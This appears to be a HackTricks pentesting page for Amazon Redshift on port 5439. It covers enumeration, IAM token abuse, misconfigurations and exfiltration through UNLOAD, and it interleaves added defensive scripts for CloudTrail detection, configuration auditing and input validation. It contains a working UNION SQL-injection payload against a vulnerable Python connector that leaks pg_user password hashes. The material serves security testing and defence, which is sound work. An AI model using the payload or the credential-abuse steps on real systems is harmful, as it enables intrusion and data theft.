5439 - Pentesting Redshift
Tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Basic Information
This port is used by Amazon Redshift (the AWS managed data warehouse). The Redshift wire protocol is a slightly modified PostgreSQL protocol, so most Postgres client tooling works (psql, psycopg2, JDBC/ODBC), but the authentication and TLS requirements differ.
For more information check:
AWS - Redshift Enum - HackTricks Cloud
Enumeration & Connectivity
- Default port: 5439/TCP (customizable). Serverless workgroups also default to 5439.
- Public endpoint pattern: `<clusterid>.<random>.<region>.redshift.amazonaws.com` (public) or `.redshift.amazonaws.com.cn` (China). Serverless: `<workgroup>.<random>.<region>.redshift-serverless.amazonaws.com`.
- TLS: Redshift requires TLS 1.2+ and perfect-forward-secrecy ciphers. Old clients may fail; force modern TLS:

```bash
psql "host=<endpoint> port=5439 user=awsuser dbname=dev sslmode=require"  # or using the redshift-psql wrapper
```

- The parameter group setting `require_ssl` controls whether plaintext is allowed. New clusters/workgroups use `default.redshift-2.0` with `require_ssl=true`, so downgrade/MITM is harder.
Quick enum with psql

```bash
# basic banner/version
psql "host=<endpoint> user=<u> dbname=dev" -c 'select version();'
```

Inside an interactive psql session:

```sql
-- list dbs, users, privileges
\l
\du
select * from pg_user;
select * from svv_redshift_sessions;
```
Error messages differentiate a bad password from a missing user → potential username enumeration during brute force.
Authentication paths to test
- Database password for the master user (often named `awsuser`) or for created DB users.
- IAM auth tokens: generate short-lived credentials and connect via libpq/JDBC/ODBC using `sslmode=require` and `authMech=IAM` or `plugin_name=com.amazon.redshift.plugin.OktaCredentialsProvider`. Abuse stolen IAM creds/roles with the `rds-db:connect`-style permission equivalent for Redshift.

```bash
aws redshift get-cluster-credentials --cluster-identifier <id> \
  --db-user pentest --db-name dev --duration-seconds 900
# the DbUser returned by the call is prefixed with "IAM:"; use it verbatim as the psql user
psql "host=<endpoint> user=IAM:pentest password=<token> dbname=dev sslmode=require"
```

- IAM Identity Center / SAML / Azure AD plugins: the JDBC `plugin_name` may spin up a local webserver for SSO; a captured loopback callback can leak the SAML assertion or temporary credentials.
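The credential paths above all leave a CloudTrail record, so the defender-side counterpart to this section is detection on the Redshift control-plane API. The script below is an added example (not HackTricks code) that runs a few rules over CloudTrail-style records: token requests by principals outside an approved list, token requests with `autoCreate`, denied token requests, bursts of token requests, and the two stealth/exposure changes (`ModifyClusterParameterGroup` switching a security parameter off, `ModifyCluster` making a cluster public). The records are constructed inline; their field layout follows CloudTrail's JSON (`eventSource`, `eventName`, camelCased `requestParameters`, `userIdentity.sessionContext.sessionIssuer` for assumed roles). The approved-principal list, burst threshold, account id and ARNs are assumptions a team would replace with its own.

```python
from collections import Counter

# --- assumptions: tune per environment ---
ETL_ROLE = "arn:aws:iam::111111111111:role/etl-loader"
CONTRACTOR = "arn:aws:iam::111111111111:user/contractor"
APPROVED_PRINCIPALS = {ETL_ROLE}   # principals expected to call GetClusterCredentials
GET_CREDS_BURST = 3                # more than this many token calls per principal is suspicious


def _ev(name, arn, params, src="203.0.113.10", error=None, issuer=None,
        source="redshift.amazonaws.com"):
    """Build one constructed CloudTrail-shaped record."""
    ident = {"arn": arn}
    if issuer:  # assumed roles carry the role ARN under sessionContext.sessionIssuer
        ident["sessionContext"] = {"sessionIssuer": {"arn": issuer}}
    rec = {"eventSource": source, "eventName": name, "userIdentity": ident,
           "sourceIPAddress": src, "requestParameters": params}
    if error:
        rec["errorCode"] = error
    return rec


CREDS = {"clusterIdentifier": "dw", "dbUser": "pentest", "dbName": "dev", "durationSeconds": 900}

# Constructed sample trail: one benign ETL token call, then a contractor user
# requesting tokens repeatedly, being denied once, disabling activity logging
# and flipping the cluster to public. The last record is unrelated S3 noise.
SAMPLE_TRAIL = [
    _ev("GetClusterCredentials", "arn:aws:sts::111111111111:assumed-role/etl-loader/i-0abc",
        {"clusterIdentifier": "dw", "dbUser": "etl", "dbName": "dev", "durationSeconds": 900},
        src="10.0.1.5", issuer=ETL_ROLE),
    _ev("GetClusterCredentials", CONTRACTOR, dict(CREDS, autoCreate=True)),
    _ev("GetClusterCredentials", CONTRACTOR, CREDS),
    _ev("GetClusterCredentials", CONTRACTOR, CREDS),
    _ev("GetClusterCredentials", CONTRACTOR, CREDS),
    _ev("GetClusterCredentials", CONTRACTOR, CREDS, error="AccessDenied"),
    _ev("ModifyClusterParameterGroup", CONTRACTOR,
        {"parameterGroupName": "custom-pg",
         "parameters": [{"parameterName": "enable_user_activity_logging",
                         "parameterValue": "false"}]}),
    _ev("ModifyCluster", CONTRACTOR, {"clusterIdentifier": "dw", "publiclyAccessible": True}),
    _ev("GetObject", CONTRACTOR, {"bucketName": "b"}, source="s3.amazonaws.com"),
]


def _principal(ev):
    """Role ARN for assumed-role sessions, otherwise the userIdentity ARN."""
    ident = ev.get("userIdentity", {})
    issuer = ident.get("sessionContext", {}).get("sessionIssuer", {}).get("arn")
    return issuer or ident.get("arn", "?")


def analyze(records):
    """Return a list of finding dicts (each with a 'rule' key) for the records."""
    findings, burst = [], Counter()
    for ev in records:
        if ev.get("eventSource") != "redshift.amazonaws.com":
            continue
        name, params = ev.get("eventName"), ev.get("requestParameters") or {}
        who, src = _principal(ev), ev.get("sourceIPAddress", "?")
        if name == "GetClusterCredentials":
            if ev.get("errorCode"):
                findings.append({"rule": "GET_CREDS_DENIED", "principal": who, "src": src})
                continue
            if who not in APPROVED_PRINCIPALS:
                findings.append({"rule": "GET_CREDS_UNAPPROVED_PRINCIPAL", "principal": who,
                                 "dbUser": params.get("dbUser"), "src": src})
            if params.get("autoCreate"):
                findings.append({"rule": "GET_CREDS_AUTOCREATE_USER", "principal": who,
                                 "dbUser": params.get("dbUser")})
            burst[who] += 1
        elif name == "ModifyClusterParameterGroup":
            for p in params.get("parameters", []):
                if (p.get("parameterName") in ("enable_user_activity_logging", "require_ssl")
                        and str(p.get("parameterValue")).lower() == "false"):
                    findings.append({"rule": "SECURITY_PARAM_DISABLED", "principal": who,
                                     "param": p["parameterName"]})
        elif name == "ModifyCluster" and params.get("publiclyAccessible") is True:
            findings.append({"rule": "CLUSTER_MADE_PUBLIC", "principal": who,
                             "cluster": params.get("clusterIdentifier")})
    for who, n in burst.items():
        if n > GET_CREDS_BURST:
            findings.append({"rule": "GET_CREDS_BURST", "principal": who, "count": n})
    return findings


def summarize(findings):
    """Count findings per rule, handy for alert routing and for tests."""
    return Counter(f["rule"] for f in findings)


if __name__ == "__main__":
    for f in analyze(SAMPLE_TRAIL):
        print(f)
```

`GetClusterCredentials` is logged as a management event, so no extra trail configuration is needed for these rules; pairing them with `enable_user_activity_logging` on the cluster gives the SQL-level view of what the token was then used for.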
Common misconfigurations (network)
- A cluster marked `PubliclyAccessible=true` with a wide-open SG (0.0.0.0/0) exposes a Postgres-like surface for brute force or SQLi exploitation.
- Default port 5439 plus the default SG allows easy discovery (Shodan/Censys). Changing the port is minor obscurity but is sometimes overlooked in hardening checklists.
- No enhanced VPC routing → `COPY`/`UNLOAD` go over the public Internet; this can be abused for exfil when the attacker controls the S3 bucket/endpoint.
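The three misconfigurations above, together with the `require_ssl` and `enable_user_activity_logging` parameter-group settings mentioned elsewhere on this page, can all be read from three API responses. The script below is an added example (not HackTricks code) that audits one cluster description offline: the dict shapes mirror the boto3 responses of `redshift.describe_clusters`, `redshift.describe_cluster_parameters` and `ec2.describe_security_groups`, but the data is constructed here so it runs without AWS access. Finding names, the sample identifiers and the choice to treat a missing parameter as "off" are assumptions.

```python
import ipaddress

# --- constructed sample data; field names follow the AWS API responses ---
SAMPLE_CLUSTER = {
    "ClusterIdentifier": "example-dw",
    "PubliclyAccessible": True,
    "Encrypted": False,
    "EnhancedVpcRouting": False,
    "Endpoint": {"Address": "example-dw.abc123.us-east-1.redshift.amazonaws.com", "Port": 5439},
    "VpcSecurityGroups": [{"VpcSecurityGroupId": "sg-0example", "Status": "active"}],
    "ClusterParameterGroups": [{"ParameterGroupName": "custom-pg", "ParameterApplyStatus": "in-sync"}],
}

# ec2.describe_security_groups -> SecurityGroups[].IpPermissions, keyed by group id
SAMPLE_SECURITY_GROUPS = {
    "sg-0example": [
        {"IpProtocol": "tcp", "FromPort": 5439, "ToPort": 5439,
         "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": []},
    ]
}

# redshift.describe_cluster_parameters -> Parameters[], keyed by group name
SAMPLE_PARAMETERS = {
    "custom-pg": [
        {"ParameterName": "require_ssl", "ParameterValue": "false"},
        {"ParameterName": "enable_user_activity_logging", "ParameterValue": "false"},
    ]
}


def _open_to_world(rules, port):
    """True if any ingress rule exposes `port` to 0.0.0.0/0 or ::/0."""
    for rule in rules:
        proto = rule.get("IpProtocol")
        if proto not in ("tcp", "-1"):       # "-1" means all protocols/ports
            continue
        lo = 0 if proto == "-1" else rule.get("FromPort", 0)
        hi = 65535 if proto == "-1" else rule.get("ToPort", 65535)
        if not lo <= port <= hi:
            continue
        cidrs = [r["CidrIp"] for r in rule.get("IpRanges", [])]
        cidrs += [r["CidrIpv6"] for r in rule.get("Ipv6Ranges", [])]
        if any(ipaddress.ip_network(c, strict=False).prefixlen == 0 for c in cidrs):
            return True
    return False


def _param(parameters, name, default="false"):
    """Value of a parameter-group setting; a missing setting counts as off (assumption)."""
    for p in parameters:
        if p["ParameterName"] == name:
            return p.get("ParameterValue", default)
    return default


def audit_cluster(cluster, security_groups, param_groups):
    """Return a list of finding identifiers for one describe_clusters entry."""
    findings = []
    port = cluster["Endpoint"]["Port"]
    if cluster.get("PubliclyAccessible"):
        findings.append("PUBLICLY_ACCESSIBLE")
        for sg in cluster.get("VpcSecurityGroups", []):
            if _open_to_world(security_groups.get(sg["VpcSecurityGroupId"], []), port):
                findings.append(f"SG_OPEN_TO_WORLD:{sg['VpcSecurityGroupId']}:{port}")
    if port == 5439:
        findings.append("DEFAULT_PORT")
    if not cluster.get("EnhancedVpcRouting"):
        findings.append("NO_ENHANCED_VPC_ROUTING")   # COPY/UNLOAD traverse the public Internet
    if not cluster.get("Encrypted"):
        findings.append("UNENCRYPTED_AT_REST")
    for pg in cluster.get("ClusterParameterGroups", []):
        params = param_groups.get(pg["ParameterGroupName"], [])
        if _param(params, "require_ssl").lower() != "true":
            findings.append(f"REQUIRE_SSL_OFF:{pg['ParameterGroupName']}")
        if _param(params, "enable_user_activity_logging").lower() != "true":
            findings.append(f"USER_ACTIVITY_LOGGING_OFF:{pg['ParameterGroupName']}")
    return findings


if __name__ == "__main__":
    for finding in audit_cluster(SAMPLE_CLUSTER, SAMPLE_SECURITY_GROUPS, SAMPLE_PARAMETERS):
        print(finding)
```

`require_ssl=true` only forces encryption on the wire; a client that connects with `sslmode=require` still does not verify the server certificate, so libpq clients should use `sslmode=verify-full` with `sslrootcert` pointing at the Redshift CA bundle.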
Attack notes
- If login succeeds: Redshift Serverless has no superuser; in provisioned clusters the master user has broad rights, including creating UDFs (Python), external schemas to Spectrum, `COPY` from attacker-controlled S3, and `UNLOAD` to exfil data.
- Check the cluster parameter group for `max_concurrency_scaling_clusters`, `require_ssl`, `enable_user_activity_logging` – logging disabled aids stealth.
- Serverless workgroups are still reachable via TCP; same SQL attack surface as provisioned clusters.
- Client-side metadata SQLi (Dec 2024): JDBC 2.1.0.31, Python connector 2.1.4 and ODBC 2.1.5.0 build metadata queries with unquoted user input in `getSchemas`/`getTables`/`getColumns` (CVE-2024-12744/5/6). If an app lets attackers control catalog or pattern arguments, you can inject arbitrary SQL that runs as the DB user the connector uses.

```python
# exploit vulnerable python connector 2.1.4 via metadata API
import redshift_connector

conn = redshift_connector.connect(host='<endpoint>', database='dev', user='lowpriv', password='pw')
cur = conn.cursor()
# injection in table_name_pattern leaks data from pg_tables
# (the cursor method takes schema_pattern=, not table_schema=)
cur.get_tables(schema_pattern='public', table_name_pattern="%' UNION SELECT usename,passwd FROM pg_user--")
```

- UDF execution model change: Python UDFs stop working June 30, 2026; only Lambda UDFs are allowed after that. Offensive impact: legacy provisioned clusters still run Python UDFs for in-cluster code exec (no FS/network). Lambda UDFs move the code to Lambda, where the IAM role may reach Internet/VPC endpoints for SSRF/pivot but with no direct cluster filesystem access. Hunting old clusters with Python UDFs enabled can still yield RCE primitives.
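For the metadata-API injection bullet above, the application-side fix while drivers are being patched is to stop untrusted input from reaching the catalog query unescaped. The snippet below is an added example (not HackTricks code and not the AWS driver's code): `build_tables_query_unsafe` reproduces the shape the bulletin describes (input concatenated into the query text) with a simplified `pg_tables` query, `build_tables_query_safe` shows the same query with properly quoted literals, and `validate_like_pattern` / `guarded_get_tables` show an allowlist wrapper an application can put in front of `cursor.get_tables`. The exact SQL the real drivers generate is not reproduced; the simplified query is an assumption.

```python
import re

# Schema/table patterns only need identifier characters and LIKE wildcards;
# quotes, comments, semicolons and whitespace have no legitimate use here.
_PATTERN_RE = re.compile(r"^[A-Za-z0-9_%]{1,127}$")

# The payload from the note above, kept here only as a test input.
PAYLOAD = "%' UNION SELECT usename,passwd FROM pg_user--"


def validate_like_pattern(pattern: str) -> str:
    """Allowlist check for a LIKE pattern; raises on anything outside the allowlist."""
    if not _PATTERN_RE.fullmatch(pattern):
        raise ValueError(f"refusing suspicious LIKE pattern: {pattern!r}")
    return pattern


def quote_literal(value: str) -> str:
    """Quote a string as a SQL literal by doubling embedded single quotes.
    Backslashes are rejected rather than escaped because their treatment inside
    literals differs between Redshift and modern PostgreSQL; NUL is never valid."""
    if "\\" in value or "\x00" in value:
        raise ValueError("unsupported character in literal")
    return "'" + value.replace("'", "''") + "'"


def build_tables_query_unsafe(schema: str, table_pattern: str) -> str:
    """Vulnerable shape: user input interpolated straight into the query text."""
    return ("SELECT schemaname, tablename FROM pg_tables "
            f"WHERE schemaname = '{schema}' AND tablename LIKE '{table_pattern}'")


def build_tables_query_safe(schema: str, table_pattern: str) -> str:
    """Hardened shape: each value becomes one quoted literal, so a quote in the
    input stays inside the string instead of terminating it."""
    return ("SELECT schemaname, tablename FROM pg_tables "
            f"WHERE schemaname = {quote_literal(schema)} "
            f"AND tablename LIKE {quote_literal(table_pattern)}")


def guarded_get_tables(cursor, schema: str, table_pattern: str):
    """Validate before the driver sees the arguments. `cursor` only needs a
    get_tables(schema_pattern=, table_name_pattern=) method (the signature of the
    redshift_connector cursor), so a stand-in object works for offline tests."""
    return cursor.get_tables(
        schema_pattern=validate_like_pattern(schema),
        table_name_pattern=validate_like_pattern(table_pattern),
    )


if __name__ == "__main__":
    print("unsafe:", build_tables_query_unsafe("public", PAYLOAD))
    print("safe:  ", build_tables_query_safe("public", PAYLOAD))
    try:
        validate_like_pattern(PAYLOAD)
    except ValueError as exc:
        print("blocked:", exc)
```

In the unsafe form the `'` in the payload closes the `LIKE` literal and the `UNION` becomes part of the statement; in the safe form the whole payload is a single literal that merely fails to match any table name. The allowlist is the stronger control for this API because a catalog lookup never needs anything beyond identifier characters and `%`/`_`.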
Recent security changes (offense impact)
- Public access is disabled by default on new clusters/snapshots (Jan 10, 2025 change). Legacy ones may still be public.
- Encryption at rest plus enforced TLS by default mean sniffing/MITM is harder; you need valid credentials or SSRF into the VPC path.
- Serverless VPCE rollout change (Jun 27, 2025): workgroup endpoints are created in up to 3 AZs at creation time. Discovery tools should enumerate all workgroup VPCE DNS names per AZ to find reachable IPs.
References
- AWS Security Bulletin – SQLi in Redshift JDBC/Python/ODBC drivers (CVE-2024-12744/5/6)
- AWS Big Data Blog – Python UDF end-of-support and migration to Lambda UDFs (Jan 2026)